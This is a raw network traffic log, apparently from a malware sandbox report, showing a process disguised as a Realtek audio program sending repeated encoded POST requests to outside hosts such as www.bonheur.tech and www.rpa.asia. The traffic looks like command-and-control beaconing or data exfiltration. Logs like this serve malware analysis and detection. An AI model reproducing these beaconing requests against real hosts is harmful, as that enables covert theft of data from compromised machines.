Jan 13, 2025 10:22:31.647571087 CET	799	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 35 57 2b 6b 55 78 57 39 43 4d 31 4f 46 58 67 30 4e 2b 33 48 77 3d 3d Data Ascii: AuPF3v=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys5W+kUxW9CM1OFXg0N+3Hw==
Jan 13, 2025 10:22:31.749876976 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.11.20	49788	13.248.169.48	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:34.275103092 CET	819	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 66 45 46 4a 71 46 68 55 62 51 6b 58 78 4f 76 37 61 38 64 45 3d Data Ascii: AuPF3v=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RfEFJqFhUbQkXxOv7a8dE=
Jan 13, 2025 10:22:34.379445076 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.11.20	49789	13.248.169.48	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:36.913814068 CET	1289	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 6a 39 30 54 6b 6d 6a 47 31 6a 35 35 45 55 76 32 31 56 44 62 61 4f 30 41 6e 37 2b 34 46 59 70 35 68 73 35 51 77 4a 44 37 6a 33 70 37 72 48 51 4a 41 55 32 78 36 4e 33 43 45 4d 68 77 46 6d 70 36 4b 30 41 66 54 79 58 59 61 50 62 6a 68 61 7a 7a 7a 36 36 66 32 4a 6a 67 52 6a 61 49 35 70 55 51 65 65 79 34 31 71 53 5a 62 65 79 64 4a 6c 64 53 6c 37 73 74 50 38 62 51 6e 77 69 30 54 35 4f 52 67 6d 6f 71 42 52 49 45 6d 77 4b 72 32 73 6f 52 70 76 6f 52 43 41 64 32 4f 61 78 6b 4c 55 6b 2f 5a 6b 64 6d 6a 55 4e 4c 79 65 58 55 76 53 4f 33 49 2b 42 32 69 71 4e 34 6a 48 71 37 74 59 35 61 4a 55 43 [TRUNCATED] Data Ascii: AuPF3v=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct2w3KwuXOQaRK62qCgK6izQQR3PnNt533x8d+D88qVrtl/3novBX0mAk2V5J3X9OtW7NlxcJXlMu/9n0cog9lsLFfjwmgIBwj90TkmjG1j55EUv21VDbaO0An7+4FYp5hs5QwJD7j3p7rHQJAU2x6N3CEMhwFmp6K0AfTyXYaPbjhazzz66f2JjgRjaI5pUQeey41qSZbeydJldSl7stP8bQnwi0T5ORgmoqBRIEmwKr2soRpvoRCAd2OaxkLUk/ZkdmjUNLyeXUvSO3I+B2iqN4jHq7tY5aJUCiiknmREZA9cZcJkDO2+6oD/LVa2d15kffj9dR6J5GJ07aWok6vBILgh79bpV52H+cR+RE+UczrNL+4F0/w+f4EeShNuSZAyM/94xHEvT1ze5ORCDvmft4wdGDmNiNBkcMbEqG8uyxdDWD49kiEFlR5Lrtao8BOfU0vPvkKhgVPJ6AgcIfM3hrlry9drRguaUok91QHWpywFR0fc9fUUK+LR5nrYHYRNsWpred7L7Kw8aw9VCan1w0kDZrppLXc9PKNe4z6E6QsbfA3orN/rzanbrZVtD3A46lioLf6j0hXFupgIe0UmmQBc+S8qMPedqF7Jodn+xK4UqThoSK+SEtY8umi+qmd5qNu
Jan 13, 2025 10:22:36.913863897 CET	3867	OUT	Data Raw: 42 2f 6d 6e 74 50 33 7a 43 47 62 4e 42 74 51 66 79 58 75 70 56 4a 43 77 73 50 7a 70 4c 50 54 6f 50 32 48 77 36 6f 43 76 68 71 68 53 35 76 43 6e 74 58 78 48 72 77 4a 6b 59 4d 6b 4b 75 73 53 43 6f 56 7a 57 48 53 6d 33 56 75 71 4a 65 57 47 41 51 62 Data Ascii: B/mntP3zCGbNBtQfyXupVJCwsPzpLPToP2Hw6oCvhqhS5vCntXxHrwJkYMkKusSCoVzWHSm3VuqJeWGAQbAFLr7ASGlEA940EcKSKqMhARluC4d6MA4QwVGg722mHYfLDXQ7Ib5Vk/XZJrfCeJKJKK8iGxKX1nUtjgaA4hK0V+PHmn1P6H7rzG77xV6g2Q7OjIiIWCM3q1d22eIUVXXFtz8NhIAT4O5qVgW88go0uqbXlqak0Pr
Jan 13, 2025 10:22:36.913909912 CET	2812	OUT	Data Raw: 38 49 76 30 73 71 45 4a 59 79 48 4a 39 54 58 2b 77 35 2f 56 45 6e 4b 74 45 71 74 36 2f 4b 53 56 76 79 62 67 68 76 4a 65 6c 47 46 50 68 42 6e 4a 77 46 65 64 67 30 6e 34 6c 61 6d 6e 49 6d 2b 72 53 34 58 71 57 57 4d 37 68 65 45 59 42 34 73 74 4a 4d Data Ascii: 8Iv0sqEJYyHJ9TX+w5/VEnKtEqt6/KSVvybghvJelGFPhBnJwFedg0n4lamnIm+rS4XqWWM7heEYB4stJMw/bAhQiGTjFlcntWbgoO1WmxLQrqR6N/BlIcfa1U/I/vmLTPqqzpR8xHv6jhRXbY2B4DxYTx6K+1sPkDjTmpgnAx6phri7sdAQ4M8UeLkOYZJlBGdoglkP3BtX7EiUVuE/cuL0LVW9+MnklIonoyp3vLhbgkrzBr1
Jan 13, 2025 10:22:37.015722990 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.11.20	49790	13.248.169.48	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:39.537175894 CET	530	OUT	GET /t3iv/?v1GdZ=vUN3&AuPF3v=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc= HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:22:39.642132044 CET	374	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 13 Jan 2025 09:22:39 GMT content-length: 253 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 31 47 64 5a 3d 76 55 4e 33 26 41 75 50 46 33 76 3d 50 31 33 36 62 53 59 77 2f 62 6f 69 6e 36 75 74 45 42 5a 37 50 4c 43 36 38 32 44 59 47 51 48 6b 39 71 4b 4c 65 54 6d 58 72 57 41 65 50 79 61 48 54 53 44 4d 46 6f 61 75 42 54 57 78 30 69 67 31 53 33 43 56 46 73 78 33 30 69 55 74 6a 52 56 51 69 42 79 35 35 49 33 59 70 39 39 47 68 33 6b 6b 38 48 35 48 32 41 45 4d 71 6b 57 42 36 67 6b 69 53 48 41 44 77 50 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?v1GdZ=vUN3&AuPF3v=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.11.20	49791	160.25.166.123	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:45.763309956 CET	787	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 78 7a 39 6d 75 4f 35 64 48 50 31 76 52 6e 35 43 38 56 44 71 6a 50 65 4b 42 58 6e 66 38 50 4a 78 2b 34 2f 75 68 69 7a 41 35 62 35 36 52 46 57 4d 6e 71 52 37 6b 69 6c 32 34 4d 4a 53 32 63 78 4d 30 55 44 4e 32 67 74 66 6a 68 74 57 56 6f 35 4a 61 48 50 5a 63 31 4b 7a 6f 77 78 4e 41 46 73 53 4c 4d 48 33 5a 51 58 78 68 4a 54 51 49 52 48 72 2f 30 37 6a 42 39 72 68 31 6c 36 52 67 70 66 43 6b 2f 45 75 6d 66 72 7a 75 72 48 30 36 47 4a 6b 48 30 39 44 58 75 62 6b 36 58 4a 65 47 56 2b 42 72 76 70 41 67 33 4b 53 53 6f 38 33 67 6e 37 37 4a 63 61 31 7a 41 3d 3d Data Ascii: AuPF3v=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BrvpAg3KSSo83gn77Jca1zA==
Jan 13, 2025 10:22:46.117784977 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:22:45 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 13, 2025 10:22:46.117808104 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.11.20	49792	160.25.166.123	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:48.639453888 CET	807	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 64 78 39 63 7a 75 67 67 4c 41 38 62 35 36 65 6c 58 49 34 36 51 57 6b 69 68 45 34 4a 70 53 32 63 6c 4d 30 56 7a 4e 32 54 46 63 78 42 74 55 4f 34 35 48 55 6e 50 5a 63 31 4b 7a 6f 77 4d 67 41 45 45 53 49 38 33 33 61 78 58 79 73 70 54 54 66 68 48 72 70 30 37 76 42 39 71 30 31 6b 6d 37 67 76 44 43 6b 2b 30 75 6d 4f 72 77 67 72 48 74 30 6d 49 4d 50 47 30 37 4f 2b 2f 6d 71 47 38 48 48 41 36 6c 6a 5a 6b 61 39 46 2b 32 52 37 67 46 6b 58 43 54 4c 65 62 75 75 49 4d 76 39 57 7a 31 42 35 7a 58 39 74 74 61 55 6f 63 66 6d 39 49 3d Data Ascii: AuPF3v=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIMv9Wz1B5zX9ttaUocfm9I=
Jan 13, 2025 10:22:48.986412048 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:22:48 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 13, 2025 10:22:48.986450911 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.11.20	49793	160.25.166.123	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:51.524970055 CET	2578	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 6c 78 39 70 76 75 69 42 4c 41 2f 62 35 36 58 46 58 4c 34 36 52 55 6b 6b 4a 41 34 4a 74 6f 32 66 64 4d 79 33 4c 4e 77 69 46 63 6f 78 74 55 52 6f 35 4b 61 48 4f 52 63 30 36 33 6f 32 73 67 41 45 45 53 49 2b 76 33 4e 77 58 79 71 70 54 51 49 52 48 6e 2f 30 37 4c 42 39 69 6b 31 6b 69 42 6a 5a 7a 43 6b 65 6b 75 6e 38 44 77 2f 37 48 34 35 47 49 55 50 47 6f 6b 4f 2b 79 58 71 46 68 73 48 48 4f 6c 67 34 56 61 74 45 69 49 45 5a 30 72 74 6a 4f 43 43 76 76 6a 78 4c 63 52 34 77 6e 43 42 75 4c 4d 38 64 56 69 41 4b 63 4a 33 49 72 71 72 78 36 39 46 54 2b 45 78 65 59 34 39 6e 34 30 33 69 45 32 62 38 75 65 70 78 4c 36 4c 59 66 42 59 76 69 63 71 52 70 69 31 56 56 7a 34 50 48 6a 45 72 30 69 68 32 64 37 2b 32 43 59 6c 6c 6f 32 6b 78 46 5a 45 39 5a 6c 65 77 51 5a 32 46 55 72 64 42 45 43 7a 6a 55 51 70 72 49 2b 32 6c 75 38 34 45 62 34 59 33 41 6d 63 53 2b 31 76 68 38 36 59 42 37 [TRUNCATED] Data Ascii: AuPF3v=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBjZzCkekun8Dw/7H45GIUPGokO+yXqFhsHHOlg4VatEiIEZ0rtjOCCvvjxLcR4wnCBuLM8dViAKcJ3Irqrx69FT+ExeY49n403iE2b8uepxL6LYfBYvicqRpi1VVz4PHjEr0ih2d7+2CYllo2kxFZE9ZlewQZ2FUrdBECzjUQprI+2lu84Eb4Y3AmcS+1vh86YB7cDkBc/L+te1Ja/SBLsL+5tSuRd2rSkKy7TGSkcJ3Od3HHSAVpQ+FGOCkUjtVyy474RpR3AJ6mgr5qZVPKTrVQ/X1sC9LVkxJzfbg2If3lv84aN75soJUUgqi44ndrb5JHzdpuAIzVGeOeG78zJ+vowD0Y5lmTvY4zof1N9lyKYzXX0QBpbBvolu7yM56i/TiqZMaHNNS7wqFqr3JS1+vC7AhGtWMjJ6IujVCsRsgK+qUIHWJmgJEJzZVyXSvsjVkfyhhCk916FtrfIt4i2EJtmWOqJI9TKWVFYBLK+i0lnJgTm4Mk9NWb9HemyRHYowXvCTOFWE1H7WUZctYCr7MowHq7SXMBaDml2lodYWp75l6VH5eySNe+lqxnZdpDr2jXSKpcDUV6jwsTkePhvZaT84T+MvaO3waHYRCTFYfyME86lgYlt4dJ58EfwdM8XBu/cmkLl5OU16BTneJScuZ2MHe5dE2VvhIczCcqhjC3CULC19rSMvKRg35UemXW4CCD/3mGYxVJ9C154GPlSEF+dLnqKP5/M0mSxjhvdbcjMh7THfDR7Mtz7AFa1F2pi4jacqEvRD8xeEf0hwQSb7GuAPT2Kjp5dkVb4u2kfY0Llbh/ZkQDNq60vMEkMsSnyIRuWYpcMX3gOqpZp2mQ/dYYHfWcrOLPaTWI+ [TRUNCATED]
Jan 13, 2025 10:22:51.525008917 CET	5378	OUT	Data Raw: 56 35 79 2f 52 44 70 74 5a 7a 32 62 2b 31 6a 37 2b 79 55 35 41 55 42 64 72 53 69 4d 6c 44 52 52 6f 56 65 71 6b 6c 69 67 61 59 65 67 64 76 2b 52 54 73 67 2b 34 73 55 45 2b 33 31 65 2f 4d 6f 30 4a 4d 51 74 75 46 39 58 75 50 30 39 78 4b 4d 6b 68 2f Data Ascii: V5y/RDptZz2b+1j7+yU5AUBdrSiMlDRRoVeqkligaYegdv+RTsg+4sUE+31e/Mo0JMQtuF9XuP09xKMkh/ydEFXUL6Ch06TbOdvPBekA4FyRislw6WhoIoX5dusRWgFfJ43w5Fif4e/udovXehnvfG9LjCS8Cf7MAQPxo3K8IVwLZvz8zjrZ5ti6uaOiQ9T7FHwlnMeo4IGyriuGq3pg9Uklq+QTr+UuiSbfnJxGO++Z0kLwULn
